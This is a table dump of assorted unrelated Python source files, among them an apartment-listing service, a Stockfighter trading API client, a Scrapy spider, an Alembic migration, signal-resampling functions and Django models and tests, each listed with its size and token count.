text string | size int64 | token_count int64 |
|---|---|---|
"""
apartmentbot.services.listing_service
"""
import logging
from dataclasses import dataclass
from typing import List
from dataclasses_json import dataclass_json
from apartmentbot.geolocation.geolocation import distance_finder, neighborhood_locator, place_locator
from apartmentbot.models import Listing, Place, Preferences
from apartmentbot.sources.sources import sources
from apartmentbot.repository.repository import listing_repository
@dataclass_json
@dataclass
class ListingService:
""" Class ListingService finds and saves apartment listings """
def find_listings(self, preferences: Preferences) -> List[Listing]:
"""
Finds all listings that match the set of apartment preferences
:param preferences: A set of apartment preferences
:return: A list of apartment listings (may return nothing)
"""
logging.info("Searching listings", extra={"preferences": preferences})
source_listings = self._search_sources(preferences)
return self._match_additional(preferences, source_listings)
def save_listing(self, listing: Listing):
""" Stores listing in the database """
logging.info("Saving listing", extra={"listing": listing})
return listing_repository.add(listing)
@staticmethod
def _search_sources(preferences: Preferences):
""" Returns listings from all available listing sites """
return [listings for source in sources for listings in source.get_results(preferences)]
def _match_additional(self, preferences: Preferences, listings: List[Listing]) -> List[Listing]:
""" Filters listings by optional additional preferences """
if not preferences.additional:
return listings
if preferences.additional.neighborhoods:
listings = [listing for listing in listings
if self._is_in_neighborhood(listing, preferences.additional.neighborhoods)]
logging.debug('Neighborhood matches: %d', len(listings))
for place in preferences.additional.places:
listings = [listing for listing in listings
if self._is_near_place(listing, place.name, place.distance)]
logging.debug('Place matches: %d', len(listings))
return listings
@staticmethod
def _is_in_neighborhood(listing: Listing, neighborhoods: List[str]) -> bool:
""" Determines whether the listing is in a chosen neighborhood """
neighborhood = neighborhood_locator.find_neighborhood(latlng=listing.geotag)
logging.debug("Listing neighborhood result: %s", neighborhood,
extra={"listing_id": listing.id, "geotag": listing.geotag})
if neighborhood in neighborhoods:
listing.neighborhood = neighborhood
return True
return False
@staticmethod
def _is_near_place(listing: Listing, place_name: str, max_distance: int) -> bool:
""" Determines whether listing is within max_distance of some searchable place """
place = place_locator.find_place(place=place_name, latlng=listing.geotag)
distance = distance_finder.find_distance(origin=listing.geotag, destination=place)
logging.debug("Distance (meters) between listing and %s: %d", place_name, distance,
extra={"listing_id": listing.id, "place_id": place, "geotag": listing.geotag})
if distance <= max_distance:
listing.places.append(Place(place_name, distance))
return True
return False
| 3,548 | 952 |
import requests
import json
BASE_URL = "https://api.stockfighter.io/ob/api/"
class StockMinion(object):
'''Handles all API related requests for stock/order functionality'''
def __init__(self, api_key, account, venue, stock):
# use sessions to persist the HTTP connection
# this will prevent thrashing HTTP sockets
self.session = requests.Session()
# set header in session, this will be reused by every function
header = {'X-Starfighter-Authorization' : api_key}
self.session.headers.update(header)
# set some basic, usually static, values
self.account = account
self.venue = venue
self.stock = stock
def check_api(self):
# _call_api is sufficiently general to handle all cases
data = self._call_api(BASE_URL + 'heartbeat', 'get')
return data
def check_venue(self):
venue = self.venue
data = self._call_api(BASE_URL + 'venues/{0}/heartbeat'.format(venue), 'get')
return data
def get_stocks_on_venue(self):
venue = self.venue
data = self._call_api(BASE_URL + 'venues/{0}/stocks'.format(venue), 'get')
return data
def get_orderbook(self):
venue = self.venue
stock = self.stock
data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}'.format(venue, stock), 'get')
return data
# using kwargs here allows me to call this function with keywords or with a dict
def place_order(self, **kwargs):
kwargs['account'] = self.account
kwargs['stock'] = self.stock
kwargs['venue'] = self.venue
# the args we need to make the request of the API
mandatory = ['account', 'venue', 'stock', 'qty', 'direction', 'orderType']
# filter out the args we're missing from the kwargs dict
missing_args = [x for x in mandatory if x not in kwargs]
# raises exception with missing operands
if(missing_args):
raise TypeError("Missing '{0}' arguments in function call".format(', '.join(missing_args)))
# leave the dictionary packed
request_body = kwargs
data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders'.format(kwargs['venue'], kwargs['stock']),
'post', data=json.dumps(request_body))
return data
def get_quote(self):
venue = self.venue
stock = self.stock
data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/quote'.format(venue, stock), 'get')
return data
def get_order_status(self, id):
venue = self.venue
stock = self.stock
data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(venue, stock, id), 'get')
return data
def cancel_order(self, id):
venue = self.venue
stock = self.stock
data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(venue, stock, id), 'delete')
return data
def get_all_orders(self, stock = None):
venue = self.venue
account = self.account
if(stock):
# get orders for specific stock
data = self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/stocks/{2}/orders'.format(venue, account, stock), 'get')
else:
data = self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/orders'.format(venue, account), 'get')
return data
def _call_api(self, url, verb, *args, **kwargs):
# use HTTP verb argument to pick the method to use from the Session object
func = getattr(self.session, verb)
resp = func(url, *args, **kwargs)
data = StockMinion._process_response(resp.text, resp.status_code)
return data
@staticmethod
def _process_json(json_obj):
try:
data = json.loads(json_obj)
except ValueError as e:
data = {}
print(e)
return data
@staticmethod
def _process_status(code):
if(code != 200):
print("Got a status code of {0}".format(code))
else:
pass
@staticmethod
def _process_response(json_obj, code):
data = StockMinion._process_json(json_obj)
StockMinion._process_status(code)
return data
if __name__ == '__main__':
import sys
def print_test_result(data, function):
if(data['ok'] == True):
print("PASS: {0}()".format(function))
else:
print("FAIL: {1}()".format(function))
# run some simple regression tests
TEST_VENUE = "TESTEX"
TEST_STOCK = "FOOBAR"
TEST_ACCOUNT = "EXB123456"
# pick up api key from local untracked file
with open('api.key', 'r') as secret_file:
API_KEY = secret_file.readlines()[0].rstrip('\n')
instance = StockMinion(API_KEY, TEST_ACCOUNT, TEST_VENUE, TEST_STOCK)
data = instance.check_api()
# the numerous calls to print_test_result can probably be eliminated at some point
print_test_result(data, 'check_api')
data = instance.check_venue()
print_test_result(data, 'check_venue')
data = instance.get_stocks_on_venue()
print_test_result(data, 'get_stocks_on_venue')
data = instance.get_orderbook()
print_test_result(data, 'get_orderbook')
data = instance.place_order(qty = 100, direction = "buy", orderType = "limit", price = 100)
print_test_result(data, 'place_order')
order_num = data['id']
data = instance.get_quote()
print_test_result(data, 'get_quote')
data = instance.get_order_status(order_num)
print_test_result(data, 'get_order_status')
data = instance.cancel_order(order_num)
print_test_result(data, 'cancel_order')
data = instance.get_all_orders()
print_test_result(data, 'get_all_orders')
data = instance.get_all_orders(TEST_STOCK)
print_test_result(data, 'get_all_orders')
| 6,016 | 1,884 |
for i in range(4):
print(i)
print("Hello world")
| 54 | 22 |
# -*- coding: utf-8 -*-
import scrapy
import os
from ucsc.items import FacultyItem, ProgramStatementItem, CourseDescriptionItem
def path_components (path):
if '://' in path:
path = path.split('://')[1]
parts = path.split('/')
while parts and parts[0] == '':
parts = parts[1:]
while parts and parts[-1] == '':
parts = parts[:-1]
return parts
assert(path_components('') == [])
assert(path_components('/') == [])
assert(path_components('foo/') == ['foo'])
assert(path_components('/bar') == ['bar'])
assert(path_components('foo/bar') == ['foo','bar'])
def merge_url (url, rel):
# note: blame seiji for all the issues with this code
thing = url.split('://')[0] if '://' in url else 'https'
if url and url[-1] == '/':
url = path_components(url)
else:
url = path_components(url)[:-1]
for part in path_components(rel):
if part == '..':
url = url[:-1]
else:
url.append(part)
return thing + '://' + '/'.join(url)
assert(merge_url('https://registrar.ucsc.edu/catalog/programs-courses/index.html',
'../foo/bar/../baz.html') == 'https://registrar.ucsc.edu/catalog/foo/baz.html')
assert(merge_url('', 'bar.baz') == 'https://bar.baz')
assert(merge_url('https://foo/bar/baz.html', '') == 'https://foo/bar')
registrar_base_url = 'https://registrar.ucsc.edu/catalog/programs-courses'
base_course_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions'
base_faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty'
base_program_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements'
class RegistrarCoursesSpider(scrapy.Spider):
name = 'registrar_courses'
allowed_domains = ['registrar.ucsc.edu']
start_urls = [merge_url(registrar_base_url, 'index.html')]
def __init__(self, *args, **kwargs):
super(RegistrarCoursesSpider, self).__init__(*args, **kwargs)
self.crawled = set()
def parse (self, response):
print("Parsing %s"%response.url)
if base_course_description_url in response.url:
yield self.parse_course_info(response)
elif base_faculty_url in response.url:
yield self.parse_faculty_info(response)
elif base_program_description_url in response.url:
yield self.parse_program_info(response)
all_links = response.xpath('//a')
for link in all_links:
#print("Got link: %s"%link.extract())
try:
href = link.xpath('@href').extract()[0]
def is_local_url (url):
for thing in ('http:','https:','C:','www','ucsc.edu'):
if thing in url:
return False
return True
url = merge_url(response.url, href) if is_local_url(href) else href
if url in self.crawled:
continue
#print("Got URL: %s"%url)
self.crawled.add(url)
if registrar_base_url in url:
yield { 'url': url }
yield scrapy.Request(url, self.parse)
else:
pass
#print("Skipping %s"%url)
except IndexError:
pass
def parse_course_info (self, response):
info = CourseDescriptionItem()
info['url'] = response.url
print("Got %s"%response.url)
return info
def parse_faculty_info (self, response):
info = FacultyItem()
info['url'] = response.url
print("Got %s"%response.url)
return info
def parse_program_info (self, response):
info = ProgramStatementItem()
info['url'] = response.url
print("Got %s"%response.url)
return info
class Unused:
def parse(self, response):
# Get links to all course pages from the registrar
page_content = response\
.xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\
.xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]')
panel_elems = page_content.xpath('table/tbody/tr/td')
self.depts = {}
self.crawled = set()
for panel in panel_elems:
program_statements = panel.xpath('p/a')
for a in program_statements:
# print(a.xpath('@href').extract())
dept = a.xpath('@href').re(r'program-statements/(\w+)\.html')[0]
title = a.xpath('text()').extract()[0]
url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept
self.depts[dept] = title
self.crawled.add(url)
yield scrapy.Request(url, callback=self.parse_program_info)
#course_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions/%s.html'%dept
program_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept
faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty/%s.html'%dept
#yield scrapy.Request(course_url, callback=self.parse_course_info)
yield scrapy.Request(program_url, callback=self.parse_program_info)
yield scrapy.Request(faculty_url, callback=self.parse_faculty_info)
def parse_program_info (self, response):
page_content = response\
.xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\
.xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]')
page_links = page_content.xpath('p[3]/a')
for a in page_links:
href, regex = a.xpath('@href'), r'\.\./([\w\-]+/\w+\.html)'
try:
page = href.re(regex)[0]
title = a.xpath('text()').extract()[0]
url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s'%page
print("\n%s: %s"%(url, title))
except IndexError:
print("Could not match '%s' with '%s'"%(href, regex))
content = page_content
#print("%s"%content.extract()[0])
def parse_course_info (self, response):
print("Got %s"%response.url)
def parse_faculty_info (self, response):
print("Got %s"%response.url)
| 6,481 | 2,022 |
"""Refactor datetime fields
Revision ID: 0e7bdd5c7473
Revises:
Create Date: 2020-05-10 17:28:07.620112
"""
import enum
from alembic import op
import sqlalchemy as sa
from sqlalchemy_utils import ChoiceType
from sqlalchemy_utils import URLType
from yui.apps.info.toranoana.models import Stock
from yui.apps.info.toranoana.models import Target
from yui.orm.types import JSONType
from yui.orm.types import TimezoneType
# revision identifiers, used by Alembic.
revision = '0e7bdd5c7473'
down_revision = None
branch_labels = None
depends_on = None
@enum.unique
class Server(enum.IntEnum):
pass
def upgrade():
op.create_table(
'event_log',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('ts', sa.String(), nullable=False),
sa.Column('channel', sa.String(), nullable=False),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'json_cache',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('body', JSONType(), nullable=True),
sa.Column(
'created_datetime', sa.DateTime(timezone=True), nullable=False
),
sa.Column('created_timezone', TimezoneType(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name'),
)
op.create_table(
'memo',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('keyword', sa.String(), nullable=False),
sa.Column('text', sa.Text(), nullable=False),
sa.Column('author', sa.String(), nullable=False),
sa.Column(
'created_datetime', sa.DateTime(timezone=True), nullable=False
),
sa.Column('created_timezone', TimezoneType(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'rss_feed_url',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('url', sa.String(), nullable=False),
sa.Column('channel', sa.String(), nullable=False),
sa.Column(
'updated_datetime', sa.DateTime(timezone=True), nullable=False
),
sa.Column('updated_timezone', TimezoneType(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'saomd_notice',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('notice_id', sa.Integer(), nullable=False),
sa.Column(
'server', ChoiceType(Server, impl=sa.Integer()), nullable=False
),
sa.Column('title', sa.String(), nullable=False),
sa.Column('duration', sa.String(), nullable=True),
sa.Column('short_description', sa.String(), nullable=True),
sa.Column('is_deleted', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_author',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_character',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('name_ko', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_circle',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_coupling',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('name_ko', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_genre',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('name_ko', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_tag',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('name_ko', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_item',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.String(), nullable=False),
sa.Column('title', sa.String(), nullable=False),
sa.Column('image_url', URLType(), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column(
'stock', ChoiceType(Stock, impl=sa.Integer()), nullable=False
),
sa.Column('genre_id', sa.Integer(), nullable=False),
sa.Column(
'male_target',
ChoiceType(Target, impl=sa.Integer()),
nullable=False,
),
sa.Column(
'female_target',
ChoiceType(Target, impl=sa.Integer()),
nullable=False,
),
sa.Column(
'checked_datetime', sa.DateTime(timezone=True), nullable=False
),
sa.Column('checked_timezone', TimezoneType(), nullable=True),
sa.Column(
'updated_datetime', sa.DateTime(timezone=True), nullable=False
),
sa.Column('updated_timezone', TimezoneType(), nullable=True),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.ForeignKeyConstraint(
['genre_id'],
['toranoana_genre.id'],
),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('code'),
)
op.create_table(
'toranoana_watch',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('print_target_id', sa.String(), nullable=False),
sa.Column('genre_id', sa.Integer(), nullable=True),
sa.Column(
'male', ChoiceType(Target, impl=sa.Integer()), nullable=False
),
sa.Column(
'female', ChoiceType(Target, impl=sa.Integer()), nullable=False
),
sa.ForeignKeyConstraint(
['genre_id'],
['toranoana_genre.id'],
),
sa.PrimaryKeyConstraint('id'),
)
op.create_table(
'toranoana_itemauthor',
sa.Column('item_id', sa.Integer(), nullable=False),
sa.Column('author_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
['author_id'],
['toranoana_author.id'],
),
sa.ForeignKeyConstraint(
['item_id'],
['toranoana_item.id'],
),
sa.PrimaryKeyConstraint('item_id', 'author_id'),
)
op.create_table(
'toranoana_itemcharacter',
sa.Column('item_id', sa.Integer(), nullable=False),
sa.Column('character_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
['character_id'],
['toranoana_character.id'],
),
sa.ForeignKeyConstraint(
['item_id'],
['toranoana_item.id'],
),
sa.PrimaryKeyConstraint('item_id', 'character_id'),
)
op.create_table(
'toranoana_itemcircle',
sa.Column('item_id', sa.Integer(), nullable=False),
sa.Column('circle_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
['circle_id'],
['toranoana_circle.id'],
),
sa.ForeignKeyConstraint(
['item_id'],
['toranoana_item.id'],
),
sa.PrimaryKeyConstraint('item_id', 'circle_id'),
)
op.create_table(
'toranoana_itemcoupling',
sa.Column('item_id', sa.Integer(), nullable=False),
sa.Column('coupling_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
['coupling_id'],
['toranoana_coupling.id'],
),
sa.ForeignKeyConstraint(
['item_id'],
['toranoana_item.id'],
),
sa.PrimaryKeyConstraint('item_id', 'coupling_id'),
)
op.create_table(
'toranoana_itemtag',
sa.Column('item_id', sa.Integer(), nullable=False),
sa.Column('tag_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
['item_id'],
['toranoana_item.id'],
),
sa.ForeignKeyConstraint(
['tag_id'],
['toranoana_tag.id'],
),
sa.PrimaryKeyConstraint('item_id', 'tag_id'),
)
def downgrade():
op.drop_table('toranoana_itemtag')
op.drop_table('toranoana_itemcoupling')
op.drop_table('toranoana_itemcircle')
op.drop_table('toranoana_itemcharacter')
op.drop_table('toranoana_itemauthor')
op.drop_table('toranoana_watch')
op.drop_table('toranoana_item')
op.drop_table('toranoana_tag')
op.drop_table('toranoana_genre')
op.drop_table('toranoana_coupling')
op.drop_table('toranoana_circle')
op.drop_table('toranoana_character')
op.drop_table('toranoana_author')
op.drop_table('saomd_notice')
op.drop_table('rss_feed_url')
op.drop_table('memo')
op.drop_table('json_cache')
op.drop_table('event_log')
| 9,528 | 2,988 |
# Author: Simon Blanke
# Email: simon.blanke@yahoo.com
# License: MIT License
import time
import random
import numpy as np
from ..base_optimizer import BaseOptimizer
from ...search import Search
from ._sub_search_spaces import SubSearchSpaces
from ..smb_opt import BayesianOptimizer
class LocalBayesianOptimizer(BaseOptimizer, Search):
name = "Local Bayesian Optimizer"
def __init__(
self, *args, max_size=300000, n_positions=20, local_range=100, **kwargs
):
super().__init__(*args, **kwargs)
self.max_size = max_size
self.n_positions = n_positions
self.local_range = local_range
self.bayes_opt = BayesianOptimizer(self.conv.search_space)
def create_local_smbo(self, current_position):
local_ss = {}
for idx, para in enumerate(self.conv.para_names):
max_dim = max(0, current_position[idx] + self.local_range)
min_dim = min(
self.conv.dim_sizes[idx], current_position[idx] - self.local_range
)
dim_pos = np.array(self.conv.search_space_positions[idx])
dim_pos_center = np.where(
np.logical_and(dim_pos >= min_dim, dim_pos <= max_dim)
)[0]
local_ss[para] = dim_pos_center
self.bayes_opt = BayesianOptimizer(local_ss)
def finish_initialization(self):
self.create_local_smbo(self.pos_current)
@BaseOptimizer.track_nth_iter
def iterate(self):
pos_loc = self.bayes_opt.iterate()
pos_new = self.bayes_opt.conv.position2value(pos_loc)
return pos_new
def evaluate(self, score_new):
self.bayes_opt.evaluate(score_new)
self.score_new = score_new
self._evaluate_new2current(score_new)
self._evaluate_current2best()
modZero = self.nth_iter % self.n_positions == 0
if modZero:
self.create_local_smbo(self.pos_current)
| 1,937 | 649 |
import psutil
from appJar import gui
import config
import requests as req
import json
import platform
import sysInfo
app = gui(title="CMM Hub", showIcon=False)
navBarElements = []
navBarElementsCallName = []
currentContainer = ""
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
def getServerInfo():
request = req.get(config.getServerAddress() + "/api/info", verify=False)
if request.status_code == 200:
jsonData = json.loads(request.text)
return jsonData
return {}
def getUserInfo():
request = req.get(config.getServerAddress() + "/api/user/currentUser", verify=False,
params={"devicesecret": config.getDeviceSecret()})
if request.status_code == 200:
jsonData = json.loads(request.text)
return jsonData
return {}
def getInstallableModules():
serverInfo = getServerInfo()
moduleListURL = serverInfo["moduleListURL"]
request = req.get(moduleListURL, verify=False)
if request.status_code == 200:
modules = {}
data = request.text
lines = data.split('\n')
for line in lines:
elements = line.split(',')
modules[elements[0]] = {}
modules[elements[0]]["link"] = elements[1].replace(" ", "")
modules[elements[0]]["name"] = elements[0].capitalize()
modules[elements[0]]["version"] = elements[2].replace(" ", "")
return modules
def getDeviceInfo():
deviceInfo = {}
uname = platform.uname()
deviceInfo["os"] = uname.system + str(uname.release)
deviceInfo["name"] = uname.node
deviceInfo["architecture"] = uname.machine
deviceInfo["processor"] = {}
deviceInfo["processor"]["processor Declaration"] = uname.processor
deviceInfo["processor"]["cores"] = psutil.cpu_count(logical=False)
deviceInfo["processor"]["threads"] = psutil.cpu_count(logical=True)
svmem = psutil.virtual_memory()
deviceInfo["installed RAM"] = get_size(svmem.total)
return deviceInfo
| 2,235 | 713 |
name0_1_0_1_0_4_0 = None
name0_1_0_1_0_4_1 = None
name0_1_0_1_0_4_2 = None
name0_1_0_1_0_4_3 = None
name0_1_0_1_0_4_4 = None | 128 | 89 |
#!/usr/bin/python3
import cv2
import numpy as np
import sys
import os
import pickle
import datetime
import base64
import io
from matplotlib import pyplot as plt
from PIL import Image
import extract_feature
# x = np.random.randint(25,100,25)
# y = np.random.randint(175,255,25)
# z = np.hstack((x,y))
# z = z.reshape((50,1))
# z = np.float32(z)
# # plt.hist(z,256,[0,256]),plt.show()
# # Define criteria = ( type, max_iter = 10 , epsilon = 1.0 )
# criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# # Set flags (Just to avoid line break in the code)
# flags = cv2.KMEANS_RANDOM_CENTERS
# # Apply KMeans
# compactness,labels,centers = cv2.kmeans(z,2,None,criteria,10,flags)
# A = z[labels==0]
# B = z[labels==1]
# # Now plot 'A' in red, 'B' in blue, 'centers' in yellow
# plt.hist(A,256,[0,256],color = 'r')
# plt.hist(B,256,[0,256],color = 'b')
# plt.hist(centers,32,[0,256],color = 'y')
# plt.show()
# img = cv2.imread('C:\\Users\\yagor\\extrator-caracteristicas\\banco_imagens\\Parthenon\\spencer-davis-1533814-unsplash.jpg', cv2.COLOR_BGR2RGB)
# # blur = cv2.bilateralFilter(img,9,500,500)
# cinza = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# canny = cv2.Canny(cinza, 150,150)
# plt.subplot(121),plt.imshow(img)
# plt.title('Imagem original'), plt.xticks([]), plt.yticks([])
# plt.subplot(122),plt.imshow(canny)
# plt.title('Imagem filtrada'), plt.xticks([]), plt.yticks([])
# plt.show()
imagens = extract_feature.ler_diretorio_imagens("banco_imagens/Colosseum")
imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Eiffel")
imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Louvre")
imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Parthenon")
size = 300, 300
for imagem in imagens:
real_img = Image.open(imagem)
sqr_img = extract_feature.make_square(real_img)
sqr_img.thumbnail(size, Image.ANTIALIAS)
sqr_img.save(imagem.replace('banco_imagens', 'banco_imagens_sqr').replace('.jpg', '.png'))
| 1,988 | 897 |
from . import console
from .version import __version__ # noqa
def main():
console.run()
| 95 | 30 |
"""
@FileName: resample.py
@Description: Implement resample
@Author: Ryuk
@CreateDate: 2021/06/27
@LastEditTime: 2021/06/27
@LastEditors: Please set LastEditors
@Version: v0.1
"""
import numpy as np
import math
__all__ = [
"direct_interpolation",
"lagrange_interpolation",
"sine_interpolation",
]
def direct_interpolation(x, L, M):
"""
resample signal with direct interpolation
:param x: input signal
:param L: original frequency
:param M: target frequency
:return: resampled signal
"""
N = len(x)
K = int((M / L) * N)
factor = L / M
y = np.zeros(K)
for k in range(K):
nk = factor * k
n = math.floor(nk)
if n + 1 >= len(x): continue
w1 = nk - n
w2 = 1 - w1
y[k] = w1 * x[n + 1] + w2 * x[n]
return y
def lagrange_interpolation(x, w, L, M):
N = len(x)
K = int((M / L) * N)
factor = L / M
y = np.zeros(K)
for k in range(K):
nk = factor * k
n = math.floor(nk) - 1
for i in range(-w, w, 1):
numerator = 1
denominator = 1
if n - i >= len(x): continue
for j in range(-w, w, 1):
if i != j:
numerator *= nk - (n - j)
denominator *= (j - i)
y[k] += x[n - i] * numerator / denominator
return y
def sine_interpolation(x, w, L, M):
N = len(x)
K = int((M / L) * N)
factor = L / M
y = np.zeros(K)
for k in range(K):
nk = factor * k
n = math.floor(nk)
for i in range(-w, w, 1):
if n - i >= len(x): continue
if nk - n + i == 0: continue
numerator = math.sin((nk - n + i))
denominator = math.pi * (nk - n +i)
y[k] += x[n - i] * numerator / denominator
return y
| 1,840 | 705 |
import numpy as np
from device_saver import load_device
""" Opens a device and prints its stored stats for the paper"""
def get_stats(fname):
print("\n============================================================")
D = load_device(fname)
print('input power of {:.4f} mW/um'.format(D.W_in*1000))
if hasattr(D, 'index_shift'):
index_shift = D.index_shift
else:
index_shift = D.simulation.compute_index_shift()
print('index shift: {:.2E}'.format(np.max(index_shift)))
print('Q-factor: {:.2E}'.format(D.Q))
print('bandwidth: {:.1f} GHz'.format(D.FWHM / 1e9))
if D.structure_type == 'two_port':
print('linear transmission: {:.4f}'.format(D.T_lin))
print('nonlinear transmission: {:.4f}'.format(D.T_nl))
elif D.structure_type == 'ortho_port':
print('linear transmission (right) = {:.4f} %'.format(100*D.W_right_lin / D.W_in))
print('linear transmission (top) = {:.4f} %'.format(100*D.W_top_lin / D.W_in))
print('nonlinear transmission (right) = {:.4f} %'.format(100*D.W_right_nl / D.W_in))
print('nonlinear transmission (top) = {:.4f} %'.format(100*D.W_top_nl / D.W_in))
print("============================================================\n")
if __name__ == '__main__':
fname2 = 'data/figs/devices/2_port.p'
get_stats(fname2)
fnameT = 'data/figs/devices/T_port.p'
get_stats(fnameT) | 1,432 | 534 |
import os
import zipfile
import tensorflow as tf
import tensorflow_datasets as tfds
import init_path
from configs.configs import parse_configs
from detection.utils.Label import *
from detection.utils.preprocess import *
from model.network import DecodePredictions
from model.get_model import backbone, models
config = parse_configs()
def get_demo_data():
url = "https://github.com/srihari-humbarwadi/datasets/releases/download/v0.1.0/data.zip"
filename = os.path.join(config.root_dir, "data_demo", "data.zip")
tf.keras.utils.get_file(filename, url)
with zipfile.ZipFile(filename, "r") as z_fp:
z_fp.extractall(os.path.join(config.root_dir,"data_demo/"))
def demo():
get_demo_data()
model = models[config.Arch](config.num_classes, backbone[config.backbone])
# fine_tune_checkpoint_type
ckpt = tf.train.Checkpoint(model)
ckpt.restore(tf.train.latest_checkpoint(config.weight)).expect_partial()
# Prepare image for demo
val_dataset, dataset_info = tfds.load("coco/2017",
split="validation",
with_info=True,
data_dir=os.path.join(config.root_dir,"data_demo/data"),
download=False)
int2str = dataset_info.features["objects"]["label"].int2str
for sample in val_dataset.take(2):
image = tf.cast(sample["image"], dtype=tf.float32)
input_image, ratio_short, ratio_long = prepare_image(image)
# Inference
predictions = model(input_image)
detections = DecodePredictions(confidence_threshold=0.5)(input_image, predictions)
num_detections = detections.valid_detections[0]
class_names = [int2str(int(x)) for x in detections.nmsed_classes[0][:num_detections]]
visualize_detections(image,
detections.nmsed_boxes[0][:num_detections].numpy(),
class_names,
detections.nmsed_scores[0][:num_detections].numpy(),
ratio_short, ratio_long
)
if __name__ == "__main__":
demo() | 2,130 | 674 |
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Person(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
fbid = models.CharField(max_length=64, primary_key=True)
last_message = models.CharField(max_length=255)
| 337 | 111 |
from datetime import datetime
from django.contrib.auth.hashers import make_password
from Logistics.models import LogisticCompanies
from roles_and_permissions.operations import Operations
from roles_and_permissions.resource_categories import ResourceCategories
from roles_and_permissions.utils import createStaffRole
from .models import StopFeedback, Stops
import uuid
from django.conf import settings
from django.test import Client, TestCase
from Users.models import Drivers
# Create your tests here.
client = Client()
secret = settings.ROOT_SECRET
content_type = "application/json"
class StopTests(TestCase):
@classmethod
def setUpTestData(cls):
global secret
global content_type
payload = {
"name": "New Logistics5",
"email": "info@newlogistics5.com",
"phone": "08099514386",
"address": "plot 7, The providince street",
"city": "Shasha",
"state": "Lagos",
"country": "Nigeria",
"description": "the powerful logistics",
"motto": "the best",
"administratorLastName": "Umoh",
"administratorFirstName": "Simeon",
"administratorUsername": "simeone05",
"administratorEmail": "simeoneumoh@gmail.com",
"administratorPhone": "08099514739",
"administratorPassword": "mickey01"
}
response = client.post(
'/v1/logistics', payload, content_type=content_type, HTTP_Secret=secret
)
print(response)
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
driver_payload = {
"firstname": "Simeone",
"lastname": "Umoh",
"username": "simlogistics",
"email": "simonumoh@mailinator.com",
"phone": "+234567890",
"password": "whatever1"
}
